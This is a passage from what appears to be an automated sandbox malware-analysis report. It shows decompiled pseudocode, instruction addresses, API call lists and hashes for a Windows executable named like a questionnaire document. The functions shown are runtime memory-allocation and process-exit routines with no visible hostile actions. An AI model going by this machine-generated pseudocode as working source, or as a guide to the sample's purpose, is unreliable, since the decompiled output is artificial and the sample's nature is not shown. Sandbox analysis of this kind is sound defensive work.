                                                                                              					__ebx = 0x4b7080 + ( *_t6 & 0x000000ff) * 8;
                                                                                              					if(__eflags != 0) {
                                                                                              						while(1) {
                                                                                              							__eax = 0x100;
                                                                                              							asm("lock cmpxchg [ebx], ah");
                                                                                              							if(__eflags == 0) {
                                                                                              								goto L5;
                                                                                              							}
                                                                                              							__ebx = __ebx + 0x20;
                                                                                              							__eflags = __ebx;
                                                                                              							__eax = 0x100;
                                                                                              							asm("lock cmpxchg [ebx], ah");
                                                                                              							if(__ebx != 0) {
                                                                                              								__ebx = __ebx + 0x20;
                                                                                              								__eflags = __ebx;
                                                                                              								__eax = 0x100;
                                                                                              								asm("lock cmpxchg [ebx], ah");
                                                                                              								if(__ebx != 0) {
                                                                                              									__ebx = __ebx - 0x40;
                                                                                              									asm("pause");
                                                                                              									__eflags =  *0x4bb989;
                                                                                              									if(__eflags != 0) {
                                                                                              										continue;
                                                                                              									} else {
                                                                                              										Sleep(0);
                                                                                              										__eax = 0x100;
                                                                                              										asm("lock cmpxchg [ebx], ah");
                                                                                              										if(__eflags != 0) {
                                                                                              											Sleep(0xa);
                                                                                              											continue;
                                                                                              										}
                                                                                              									}
                                                                                              								}
                                                                                              							}
                                                                                              							goto L5;
                                                                                              						}
                                                                                              					}
                                                                                              					L5:
                                                                                              					__edx =  *(__ebx + 8);
                                                                                              					__eax =  *(__edx + 0x10);
                                                                                              					__ecx = 0xfffffff8;
                                                                                              					__eflags = __edx - __ebx;
                                                                                              					if(__edx == __ebx) {
                                                                                              						__edx =  *(__ebx + 0x18);
                                                                                              						__ecx =  *(__ebx + 2) & 0x0000ffff;
                                                                                              						__ecx = ( *(__ebx + 2) & 0x0000ffff) + __eax;
                                                                                              						__eflags = __eax -  *(__ebx + 0x14);
                                                                                              						if(__eax >  *(__ebx + 0x14)) {
                                                                                              							_push(__esi);
                                                                                              							_push(__edi);
                                                                                              							__eflags =  *0x4bb059;
                                                                                              							if(__eflags != 0) {
                                                                                              								while(1) {
                                                                                              									__eax = 0x100;
                                                                                              									asm("lock cmpxchg [0x4bbae8], ah");
                                                                                              									if(__eflags == 0) {
                                                                                              										goto L22;
                                                                                              									}
                                                                                              									asm("pause");
                                                                                              									__eflags =  *0x4bb989;
                                                                                              									if(__eflags != 0) {
                                                                                              										continue;
                                                                                              									} else {
                                                                                              										Sleep(0);
                                                                                              										__eax = 0x100;
                                                                                              										asm("lock cmpxchg [0x4bbae8], ah");
                                                                                              										if(__eflags != 0) {
                                                                                              											Sleep(0xa);
                                                                                              											continue;
                                                                                              										}
                                                                                              									}
                                                                                              									goto L22;
                                                                                              								}
                                                                                              							}
                                                                                              							L22:
                                                                                              							 *(__ebx + 1) =  *(__ebx + 1) &  *0x4bbaf4;
                                                                                              							__eflags =  *(__ebx + 1) &  *0x4bbaf4;
                                                                                              							if(( *(__ebx + 1) &  *0x4bbaf4) == 0) {
                                                                                              								__ecx =  *(__ebx + 4) & 0x0000ffff;
                                                                                              								__edi =  *0x4bbaf0; // 0x0
                                                                                              								__eflags = __edi - ( *(__ebx + 4) & 0x0000ffff);
                                                                                              								if(__edi < ( *(__ebx + 4) & 0x0000ffff)) {
                                                                                              									__eax =  *(__ebx + 6) & 0x0000ffff;
                                                                                              									__edi = __eax;
                                                                                              									__eax = E00403BCC(__eax);
                                                                                              									__esi = __eax;
                                                                                              									__eflags = __eax;
                                                                                              									if(__eax != 0) {
                                                                                              										goto L35;
                                                                                              									} else {
                                                                                              										 *0x4bbae8 = __al;
                                                                                              										 *__ebx = __al;
                                                                                              										_pop(__edi);
                                                                                              										_pop(__esi);
                                                                                              										_pop(__ebx);
                                                                                              										return __eax;
                                                                                              									}
                                                                                              								} else {
                                                                                              									__esi =  *0x4bbaec; // 0x2220dd0
                                                                                              									__ecx =  *(__ebx + 6) & 0x0000ffff;
                                                                                              									__edx = __ecx + 0xb30;
                                                                                              									__eflags = __edi - __ecx + 0xb30;
                                                                                              									if(__edi >= __ecx + 0xb30) {
                                                                                              										__edi = __ecx;
                                                                                              									}
                                                                                              									__esi = __esi - __edi;
                                                                                              									 *0x4bbaf0 =  *0x4bbaf0 - __edi;
                                                                                              									 *0x4bbaec = __esi;
                                                                                              									goto L35;
                                                                                              								}
                                                                                              							} else {
                                                                                              								asm("bsf eax, esi");
                                                                                              								__esi = __eax * 8;
                                                                                              								__ecx =  *(0x4bbaf8 + __eax * 4);
                                                                                              								asm("bsf ecx, ecx");
                                                                                              								__ecx =  *(0x4bbaf8 + __eax * 4) + __eax * 8 * 4;
                                                                                              								__edi = 0x4bbb78 + ( *(0x4bbaf8 + __eax * 4) + __eax * 8 * 4) * 8;
                                                                                              								__esi =  *(__edi + 4);
                                                                                              								__edx =  *(__esi + 4);
                                                                                              								 *(__edi + 4) = __edx;
                                                                                              								 *__edx = __edi;
                                                                                              								__eflags = __edi - __edx;
                                                                                              								if(__edi == __edx) {
                                                                                              									__edx = 0xfffffffe;
                                                                                              									asm("rol edx, cl");
                                                                                              									_t38 = 0x4bbaf8 + __eax * 4;
                                                                                              									 *_t38 =  *(0x4bbaf8 + __eax * 4) & 0xfffffffe;
                                                                                              									__eflags =  *_t38;
                                                                                              									if( *_t38 == 0) {
                                                                                              										asm("btr [0x4bbaf4], eax");
                                                                                              									}
                                                                                              								}
                                                                                              								__edi = 0xfffffff0;
                                                                                              								__edi = 0xfffffff0 &  *(__esi - 4);
                                                                                              								__eflags = 0xfffffff0 - 0x10a60;
                                                                                              								if(0xfffffff0 < 0x10a60) {
                                                                                              									_t52 =  &((__esi - 4)[0xfffffffffffffffc]);
                                                                                              									 *_t52 = (__esi - 4)[0xfffffffffffffffc] & 0x000000f7;
                                                                                              									__eflags =  *_t52;
                                                                                              								} else {
                                                                                              									__edx = __edi;
                                                                                              									__edi =  *(__ebx + 6) & 0x0000ffff;
                                                                                              									__edx = __edx - __edi;
                                                                                              									__eax = __edi + __esi;
                                                                                              									__ecx = __edx + 3;
                                                                                              									 *(__eax - 4) = __ecx;
                                                                                              									 *(__edx + __eax - 8) = __edx;
                                                                                              									__eax = E00403B00(__eax, __ecx, __edx);
                                                                                              								}
                                                                                              								L35:
                                                                                              								_t56 = __edi + 6; // 0x6
                                                                                              								__ecx = _t56;
                                                                                              								 *(__esi - 4) = _t56;
                                                                                              								__eax = 0;
                                                                                              								 *0x4bbae8 = __al;
                                                                                              								 *__esi = __ebx;
                                                                                              								 *((intOrPtr*)(__esi + 0x10)) = 0;
                                                                                              								 *((intOrPtr*)(__esi + 0x14)) = 1;
                                                                                              								 *(__ebx + 0x18) = __esi;
                                                                                              								_t61 = __esi + 0x20; // 0x2220df0
                                                                                              								__eax = _t61;
                                                                                              								__ecx =  *(__ebx + 2) & 0x0000ffff;
                                                                                              								__edx = __ecx + __eax;
                                                                                              								 *(__ebx + 0x10) = __ecx + __eax;
                                                                                              								__edi = __edi + __esi;
                                                                                              								__edi = __edi - __ecx;
                                                                                              								__eflags = __edi;
                                                                                              								 *(__ebx + 0x14) = __edi;
                                                                                              								 *__ebx = 0;
                                                                                              								 *(__eax - 4) = __esi;
                                                                                              								_pop(__edi);
                                                                                              								_pop(__esi);
                                                                                              								_pop(__ebx);
                                                                                              								return __eax;
                                                                                              							}
                                                                                              						} else {
                                                                                              							_t19 = __edx + 0x14;
                                                                                              							 *_t19 =  *(__edx + 0x14) + 1;
                                                                                              							__eflags =  *_t19;
                                                                                              							 *(__ebx + 0x10) = __ecx;
                                                                                              							 *__ebx = 0;
                                                                                              							 *(__eax - 4) = __edx;
                                                                                              							_pop(__ebx);
                                                                                              							return __eax;
                                                                                              						}
                                                                                              					} else {
                                                                                              						 *(__edx + 0x14) =  *(__edx + 0x14) + 1;
                                                                                              						__ecx = 0xfffffff8 &  *(__eax - 4);
                                                                                              						__eflags = 0xfffffff8;
                                                                                              						 *(__edx + 0x10) = 0xfffffff8 &  *(__eax - 4);
                                                                                              						 *(__eax - 4) = __edx;
                                                                                              						if(0xfffffff8 == 0) {
                                                                                              							__ecx =  *(__edx + 8);
                                                                                              							 *(__ecx + 0xc) = __ebx;
                                                                                              							 *(__ebx + 8) = __ecx;
                                                                                              							 *__ebx = 0;
                                                                                              							_pop(__ebx);
                                                                                              							return __eax;
                                                                                              						} else {
                                                                                              							 *__ebx = 0;
                                                                                              							_pop(__ebx);
                                                                                              							return __eax;
                                                                                              						}
                                                                                              					}
                                                                                              				}
                                                                                              			}






























                                                                                              0x00404195
                                                                                              0x00404199
                                                                                              0x0040419f
                                                                                              0x004041b8
                                                                                              0x004041be
                                                                                              0x004041be
                                                                                              0x004041c0
                                                                                              0x004041de
                                                                                              0x004041c2
                                                                                              0x004041c2
                                                                                              0x004041c7
                                                                                              0x004041c9
                                                                                              0x004041ce
                                                                                              0x004041d7
                                                                                              0x004041d7
                                                                                              0x004041e3
                                                                                              0x004041eb
                                                                                              0x004041a1
                                                                                              0x004041a1
                                                                                              0x004041ab
                                                                                              0x004041b3
                                                                                              0x00000000
                                                                                              0x004041b3
                                                                                              0x00404184
                                                                                              0x00404187
                                                                                              0x0040418a
                                                                                              0x004041ec
                                                                                              0x004041ec
                                                                                              0x004041ed
                                                                                              0x004041ee
                                                                                              0x004041f5
                                                                                              0x004041f8
                                                                                              0x004041fb
                                                                                              0x004041fe
                                                                                              0x00404200
                                                                                              0x00404202
                                                                                              0x00404209
                                                                                              0x0040420b
                                                                                              0x0040420b
                                                                                              0x0040420b
                                                                                              0x00404212
                                                                                              0x00404214
                                                                                              0x00404214
                                                                                              0x00404212
                                                                                              0x00404220
                                                                                              0x00404225
                                                                                              0x00404225
                                                                                              0x00404227
                                                                                              0x00404248
                                                                                              0x00404248
                                                                                              0x00404248
                                                                                              0x00404229
                                                                                              0x00404229
                                                                                              0x0040422f
                                                                                              0x00404232
                                                                                              0x00404236
                                                                                              0x0040423c
                                                                                              0x0040423e
                                                                                              0x0040423e
                                                                                              0x0040423c
                                                                                              0x0040424d
                                                                                              0x00404250
                                                                                              0x00404253
                                                                                              0x0040425f
                                                                                              0x0040425f
                                                                                              0x00404182
                                                                                              0x00403f00
                                                                                              0x00403f00
                                                                                              0x00403f02
                                                                                              0x00403f02
                                                                                              0x00403f09
                                                                                              0x00403f10
                                                                                              0x00403f68
                                                                                              0x00403f68
                                                                                              0x00403f6d
                                                                                              0x00403f71
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403f73
                                                                                              0x00403f73
                                                                                              0x00403f76
                                                                                              0x00403f7b
                                                                                              0x00403f7f
                                                                                              0x00403f81
                                                                                              0x00403f81
                                                                                              0x00403f84
                                                                                              0x00403f89
                                                                                              0x00403f8d
                                                                                              0x00403f8f
                                                                                              0x00403f92
                                                                                              0x00403f94
                                                                                              0x00403f9b
                                                                                              0x00000000
                                                                                              0x00403f9d
                                                                                              0x00403f9f
                                                                                              0x00403fa4
                                                                                              0x00403fa9
                                                                                              0x00403fad
                                                                                              0x00403fb5
                                                                                              0x00000000
                                                                                              0x00403fb5
                                                                                              0x00403fad
                                                                                              0x00403f9b
                                                                                              0x00403f8d
                                                                                              0x00000000
                                                                                              0x00403f7f
                                                                                              0x00403f68
                                                                                              0x00403f12
                                                                                              0x00403f12
                                                                                              0x00403f15
                                                                                              0x00403f18
                                                                                              0x00403f1d
                                                                                              0x00403f1f
                                                                                              0x00403f38
                                                                                              0x00403f3b
                                                                                              0x00403f3f
                                                                                              0x00403f41
                                                                                              0x00403f44
                                                                                              0x00403fbc
                                                                                              0x00403fbd
                                                                                              0x00403fbe
                                                                                              0x00403fc5
                                                                                              0x00403fc7
                                                                                              0x00403fc7
                                                                                              0x00403fcc
                                                                                              0x00403fd4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403fd6
                                                                                              0x00403fd8
                                                                                              0x00403fdf
                                                                                              0x00000000
                                                                                              0x00403fe1
                                                                                              0x00403fe3
                                                                                              0x00403fe8
                                                                                              0x00403fed
                                                                                              0x00403ff5
                                                                                              0x00403ff9
                                                                                              0x00000000
                                                                                              0x00403ff9
                                                                                              0x00403ff5
                                                                                              0x00000000
                                                                                              0x00403fdf
                                                                                              0x00403fc7
                                                                                              0x00404000
                                                                                              0x00404004
                                                                                              0x00404004
                                                                                              0x0040400a
                                                                                              0x0040407c
                                                                                              0x00404080
                                                                                              0x00404086
                                                                                              0x00404088
                                                                                              0x004040b0
                                                                                              0x004040b4
                                                                                              0x004040b6
                                                                                              0x004040bb
                                                                                              0x004040bd
                                                                                              0x004040bf
                                                                                              0x00000000
                                                                                              0x004040c1
                                                                                              0x004040c1
                                                                                              0x004040c6
                                                                                              0x004040c8
                                                                                              0x004040c9
                                                                                              0x004040ca
                                                                                              0x004040cb
                                                                                              0x004040cb
                                                                                              0x0040408a
                                                                                              0x0040408a
                                                                                              0x00404090
                                                                                              0x00404094
                                                                                              0x0040409a
                                                                                              0x0040409c
                                                                                              0x0040409e
                                                                                              0x0040409e
                                                                                              0x004040a0
                                                                                              0x004040a2
                                                                                              0x004040a8
                                                                                              0x00000000
                                                                                              0x004040a8
                                                                                              0x0040400c
                                                                                              0x0040400c
                                                                                              0x0040400f
                                                                                              0x00404016
                                                                                              0x0040401d
                                                                                              0x00404020
                                                                                              0x00404023
                                                                                              0x0040402a
                                                                                              0x0040402d
                                                                                              0x00404030
                                                                                              0x00404033
                                                                                              0x00404035
                                                                                              0x00404037
                                                                                              0x00404039
                                                                                              0x0040403e
                                                                                              0x00404040
                                                                                              0x00404040
                                                                                              0x00404040
                                                                                              0x00404047
                                                                                              0x00404049
                                                                                              0x00404049
                                                                                              0x00404047
                                                                                              0x00404050
                                                                                              0x00404055
                                                                                              0x00404058
                                                                                              0x0040405e
                                                                                              0x004040cc
                                                                                              0x004040cc
                                                                                              0x004040cc
                                                                                              0x00404060
                                                                                              0x00404060
                                                                                              0x00404062
                                                                                              0x00404066
                                                                                              0x00404068
                                                                                              0x0040406b
                                                                                              0x0040406e
                                                                                              0x00404071
                                                                                              0x00404075
                                                                                              0x00404075
                                                                                              0x004040d1
                                                                                              0x004040d1
                                                                                              0x004040d1
                                                                                              0x004040d4
                                                                                              0x004040d7
                                                                                              0x004040d9
                                                                                              0x004040de
                                                                                              0x004040e0
                                                                                              0x004040e3
                                                                                              0x004040ea
                                                                                              0x004040ed
                                                                                              0x004040ed
                                                                                              0x004040f0
                                                                                              0x004040f4
                                                                                              0x004040f7
                                                                                              0x004040fa
                                                                                              0x004040fc
                                                                                              0x004040fc
                                                                                              0x004040fe
                                                                                              0x00404101
                                                                                              0x00404104
                                                                                              0x00404107
                                                                                              0x00404108
                                                                                              0x00404109
                                                                                              0x0040410a
                                                                                              0x0040410a
                                                                                              0x00403f46
                                                                                              0x00403f46
                                                                                              0x00403f46
                                                                                              0x00403f46
                                                                                              0x00403f4a
                                                                                              0x00403f4d
                                                                                              0x00403f50
                                                                                              0x00403f53
                                                                                              0x00403f54
                                                                                              0x00403f54
                                                                                              0x00403f21
                                                                                              0x00403f21
                                                                                              0x00403f25
                                                                                              0x00403f25
                                                                                              0x00403f28
                                                                                              0x00403f2b
                                                                                              0x00403f2e
                                                                                              0x00403f58
                                                                                              0x00403f5b
                                                                                              0x00403f5e
                                                                                              0x00403f61
                                                                                              0x00403f64
                                                                                              0x00403f65
                                                                                              0x00403f30
                                                                                              0x00403f30
                                                                                              0x00403f33
                                                                                              0x00403f34
                                                                                              0x00403f34
                                                                                              0x00403f2e
                                                                                              0x00403f1f

                                                                                              APIs
                                                                                              • Sleep.KERNEL32(00000000,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403F9F
                                                                                              • Sleep.KERNEL32(0000000A,00000000,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FB5
                                                                                              • Sleep.KERNEL32(00000000,00000000,?,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FE3
                                                                                              • Sleep.KERNEL32(0000000A,00000000,00000000,?,000000FF,00404788,00000000,0040BBE7,00000000,0040C0F5,00000000,0040C3B7,00000000,0040C3ED), ref: 00403FF9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: Sleep
                                                                                              • String ID:
                                                                                              • API String ID: 3472027048-0
                                                                                              • Opcode ID: a5f41a95b234689400651ffc7a7e648ad6c8ae29c578f3c4a4f7439c6b153684
                                                                                              • Instruction ID: d98b69cfe0522def9def3360e9182a2a8bb24ce33fa39324cc86f3a67812f259
                                                                                              • Opcode Fuzzy Hash: a5f41a95b234689400651ffc7a7e648ad6c8ae29c578f3c4a4f7439c6b153684
                                                                                              • Instruction Fuzzy Hash: 99C123B2A002018BCB15CF69EC84356BFE4EB89311F1882BFE514AB3D5D7B89941C7D8
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 402 407750-407764 403 407766-407772 call 407630 call 4076b8 402->403 404 407777-40777e 402->404 403->404 406 407780-40778b GetCurrentThreadId 404->406 407 4077a1-4077a5 404->407 406->407 409 40778d-40779c call 407388 call 40768c 406->409 410 4077a7-4077ae 407->410 411 4077c9-4077cd 407->411 409->407 410->411 416 4077b0-4077c7 410->416 412 4077d9-4077dd 411->412 413 4077cf-4077d2 411->413 418 4077fc-407805 call 4073b0 412->418 419 4077df-4077e8 call 4054b4 412->419 413->412 417 4077d4-4077d6 413->417 416->411 417->412 428 407807-40780a 418->428 429 40780c-407811 418->429 419->418 430 4077ea-4077fa call 405ce8 call 4054b4 419->430 428->429 431 40782d-407838 call 407388 428->431 429->431 432 407813-407821 call 40b40c 429->432 430->418 441 40783a 431->441 442 40783d-407841 431->442 432->431 440 407823-407825 432->440 440->431 444 407827-407828 FreeLibrary 440->444 441->442 445 407843-407845 call 40768c 442->445 446 40784a-40784d 442->446 444->431 445->446 447 407866 446->447 448 40784f-407856 446->448 450 407858 448->450 451 40785e-407861 ExitProcess 448->451 450->451
                                                                                              C-Code - Quality: 86%
                                                                                              			E00407750() {
                                                                                              				void* _t20;
                                                                                              				void* _t23;
                                                                                              				intOrPtr _t31;
                                                                                              				intOrPtr* _t33;
                                                                                              				void* _t46;
                                                                                              				struct HINSTANCE__* _t49;
                                                                                              				void* _t56;
                                                                                              
                                                                                              				if( *0x4b7004 != 0) {
                                                                                              					E00407630();
                                                                                              					E004076B8(_t46);
                                                                                              					 *0x4b7004 = 0;
                                                                                              				}
                                                                                              				if( *0x4bdbcc != 0 && GetCurrentThreadId() ==  *0x4bdbf4) {
                                                                                              					E00407388(0x4bdbc8);
                                                                                              					E0040768C(0x4bdbc8);
                                                                                              				}
                                                                                              				if( *0x004BDBC0 != 0 ||  *0x4bb054 == 0) {
                                                                                              					L8:
                                                                                              					if( *((char*)(0x4bdbc0)) == 2 &&  *0x4b7000 == 0) {
                                                                                              						 *0x004BDBA4 = 0;
                                                                                              					}
                                                                                              					if( *((char*)(0x4bdbc0)) != 0) {
                                                                                              						L14:
                                                                                              						E004073B0(); // executed
                                                                                              						if( *((char*)(0x4bdbc0)) <= 1 ||  *0x4b7000 != 0) {
                                                                                              							_t15 =  *0x004BDBA8;
                                                                                              							if( *0x004BDBA8 != 0) {
                                                                                              								E0040B40C(_t15);
                                                                                              								_t31 =  *((intOrPtr*)(0x4bdba8));
                                                                                              								_t8 = _t31 + 0x10; // 0x400000
                                                                                              								_t49 =  *_t8;
                                                                                              								_t9 = _t31 + 4; // 0x400000
                                                                                              								if(_t49 !=  *_t9 && _t49 != 0) {
                                                                                              									FreeLibrary(_t49);
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              						E00407388(0x4bdb98);
                                                                                              						if( *((char*)(0x4bdbc0)) == 1) {
                                                                                              							 *0x004BDBBC();
                                                                                              						}
                                                                                              						if( *((char*)(0x4bdbc0)) != 0) {
                                                                                              							E0040768C(0x4bdb98);
                                                                                              						}
                                                                                              						if( *0x4bdb98 == 0) {
                                                                                              							if( *0x4bb038 != 0) {
                                                                                              								 *0x4bb038();
                                                                                              							}
                                                                                              							ExitProcess( *0x4b7000); // executed
                                                                                              						}
                                                                                              						memcpy(0x4bdb98,  *0x4bdb98, 0xc << 2);
                                                                                              						_t56 = _t56 + 0xc;
                                                                                              						0x4b7000 = 0x4b7000;
                                                                                              						0x4bdb98 = 0x4bdb98;
                                                                                              						goto L8;
                                                                                              					} else {
                                                                                              						_t20 = E004054B4();
                                                                                              						_t44 = _t20;
                                                                                              						if(_t20 == 0) {
                                                                                              							goto L14;
                                                                                              						} else {
                                                                                              							goto L13;
                                                                                              						}
                                                                                              						do {
                                                                                              							L13:
                                                                                              							E00405CE8(_t44);
                                                                                              							_t23 = E004054B4();
                                                                                              							_t44 = _t23;
                                                                                              						} while (_t23 != 0);
                                                                                              						goto L14;
                                                                                              					}
                                                                                              				} else {
                                                                                              					do {
                                                                                              						_t33 =  *0x4bb054; // 0x0
                                                                                              						 *0x4bb054 = 0;
                                                                                              						 *_t33();
                                                                                              					} while ( *0x4bb054 != 0);
                                                                                              					L8:
                                                                                              					while(1) {
                                                                                              					}
                                                                                              				}
                                                                                              			}











                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00407780
                                                                                              • FreeLibrary.KERNEL32(00400000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407828
                                                                                              • ExitProcess.KERNEL32(00000000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407861
                                                                                                • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?,0040555F), ref: 004076F1
                                                                                                • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?,0040788A,004054FF,00405546,?,?), ref: 004076F7
                                                                                                • Part of subcall function 004076B8: GetStdHandle.KERNEL32(000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?,?), ref: 00407712
                                                                                                • Part of subcall function 004076B8: WriteFile.KERNEL32(00000000,000000F5,00000000,00000002,?,00000000,00000000,000000F5,Runtime error at 00000000,0000001D,?,00000000,?,00407770,?,?), ref: 00407718
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.344159474.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.344099874.0000000000400000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345709208.00000000004B7000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345761453.00000000004C0000.00000004.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345836163.00000000004C4000.00000002.00020000.sdmp
                                                                                              • Associated: 00000000.00000002.345894244.00000000004C6000.00000002.00020000.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_Girls-Questionnaire-For-Autism-Spectrum-Disorders.jbxd
                                                                                              Similarity
                                                                                              • API ID: FileHandleWrite$CurrentExitFreeLibraryProcessThread
                                                                                              • String ID: MZP
                                                                                              • API String ID: 3490077880-2889622443
                                                                                              • Opcode ID: 1ba9ccdc5e5ec41ea7066db700fb32a50d39e50ecd0d58aa72eac7c5645d258d
                                                                                              • Instruction ID: 4bb8ca2865ae45d0ec72c9e6ca862cba493d08d50c1d65b63798a8296780cd14
                                                                                              • Opcode Fuzzy Hash: 1ba9ccdc5e5ec41ea7066db700fb32a50d39e50ecd0d58aa72eac7c5645d258d
                                                                                              • Instruction Fuzzy Hash: 76317220E087415BE721BB7A888875B76E09B45315F14897FE541A33D2D77CB884CB6F
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 452 407748-407764 453 407766-407772 call 407630 call 4076b8 452->453 454 407777-40777e 452->454 453->454 456 407780-40778b GetCurrentThreadId 454->456 457 4077a1-4077a5 454->457 456->457 459 40778d-40779c call 407388 call 40768c 456->459 460 4077a7-4077ae 457->460 461 4077c9-4077cd 457->461 459->457 460->461 466 4077b0-4077c7 460->466 462 4077d9-4077dd 461->462 463 4077cf-4077d2 461->463 468 4077fc-407805 call 4073b0 462->468 469 4077df-4077e8 call 4054b4 462->469 463->462 467 4077d4-4077d6 463->467 466->461 467->462 478 407807-40780a 468->478 479 40780c-407811 468->479 469->468 480 4077ea-4077fa call 405ce8 call 4054b4 469->480 478->479 481 40782d-407838 call 407388 478->481 479->481 482 407813-407821 call 40b40c 479->482 480->468 491 40783a 481->491 492 40783d-407841 481->492 482->481 490 407823-407825 482->490 490->481 494 407827-407828 FreeLibrary 490->494 491->492 495 407843-407845 call 40768c 492->495 496 40784a-40784d 492->496 494->481 495->496 497 407866 496->497 498 40784f-407856 496->498 500 407858 498->500 501 40785e-407861 ExitProcess 498->501 500->501
                                                                                              C-Code - Quality: 86%
                                                                                              			E00407748() {
                                                                                              				intOrPtr* _t14;
                                                                                              				void* _t23;
                                                                                              				void* _t26;
                                                                                              				intOrPtr _t34;
                                                                                              				intOrPtr* _t36;
                                                                                              				void* _t50;
                                                                                              				struct HINSTANCE__* _t53;
                                                                                              				void* _t62;
                                                                                              
                                                                                              				 *((intOrPtr*)(_t14 +  *_t14)) =  *((intOrPtr*)(_t14 +  *_t14)) + _t14 +  *_t14;
                                                                                              				if( *0x4b7004 != 0) {
                                                                                              					E00407630();
                                                                                              					E004076B8(_t50);
                                                                                              					 *0x4b7004 = 0;
                                                                                              				}
                                                                                              				if( *0x4bdbcc != 0 && GetCurrentThreadId() ==  *0x4bdbf4) {
                                                                                              					E00407388(0x4bdbc8);
                                                                                              					E0040768C(0x4bdbc8);
                                                                                              				}
                                                                                              				if( *0x004BDBC0 != 0 ||  *0x4bb054 == 0) {
                                                                                              					L9:
                                                                                              					if( *((char*)(0x4bdbc0)) == 2 &&  *0x4b7000 == 0) {
                                                                                              						 *0x004BDBA4 = 0;
                                                                                              					}
                                                                                              					if( *((char*)(0x4bdbc0)) != 0) {
                                                                                              						L15:
                                                                                              						E004073B0(); // executed
                                                                                              						if( *((char*)(0x4bdbc0)) <= 1 ||  *0x4b7000 != 0) {
                                                                                              							_t18 =  *0x004BDBA8;
                                                                                              							if( *0x004BDBA8 != 0) {
                                                                                              								E0040B40C(_t18);
                                                                                              								_t34 =  *((intOrPtr*)(0x4bdba8));
                                                                                              								_t8 = _t34 + 0x10; // 0x400000
                                                                                              								_t53 =  *_t8;
                                                                                              								_t9 = _t34 + 4; // 0x400000
                                                                                              								if(_t53 !=  *_t9 && _t53 != 0) {
                                                                                              									FreeLibrary(_t53);
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              						E00407388(0x4bdb98);
                                                                                              						if( *((char*)(0x4bdbc0)) == 1) {
                                                                                              							 *0x004BDBBC();
                                                                                              						}
                                                                                              						if( *((char*)(0x4bdbc0)) != 0) {
                                                                                              							E0040768C(0x4bdb98);
                                                                                              						}
                                                                                              						if( *0x4bdb98 == 0) {
                                                                                              							if( *0x4bb038 != 0) {
                                                                                              								 *0x4bb038();
                                                                                              							}
                                                                                              							ExitProcess( *0x4b7000); // executed
                                                                                              						}
                                                                                              						memcpy(0x4bdb98,  *0x4bdb98, 0xc << 2);
                                                                                              						_t62 = _t62 + 0xc;
                                                                                              						0x4b7000 = 0x4b7000;
                                                                                              						0x4bdb98 = 0x4bdb98;
                                                                                              						goto L9;
                                                                                              					} else {
                                                                                              						_t23 = E004054B4();
                                                                                              						_t48 = _t23;
                                                                                              						if(_t23 == 0) {
                                                                                              							goto L15;
                                                                                              						} else {
                                                                                              							goto L14;
                                                                                              						}
                                                                                              						do {
                                                                                              							L14:
                                                                                              							E00405CE8(_t48);
                                                                                              							_t26 = E004054B4();
                                                                                              							_t48 = _t26;
                                                                                              						} while (_t26 != 0);
                                                                                              						goto L15;
                                                                                              					}
                                                                                              				} else {
                                                                                              					do {
                                                                                              						_t36 =  *0x4bb054; // 0x0
                                                                                              						 *0x4bb054 = 0;
                                                                                              						 *_t36();
                                                                                              					} while ( *0x4bb054 != 0);
                                                                                              					L9:
                                                                                              					while(1) {
                                                                                              					}
                                                                                              				}
                                                                                              			}












                                                                                              APIs
                                                                                              • GetCurrentThreadId.KERNEL32 ref: 00407780
                                                                                              • FreeLibrary.KERNEL32(00400000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407828
                                                                                              • ExitProcess.KERNEL32(00000000,?,?,?,0040788A,004054FF,00405546,?,?,0040555F,?,?,?,?,00453AEA,00000000), ref: 00407861
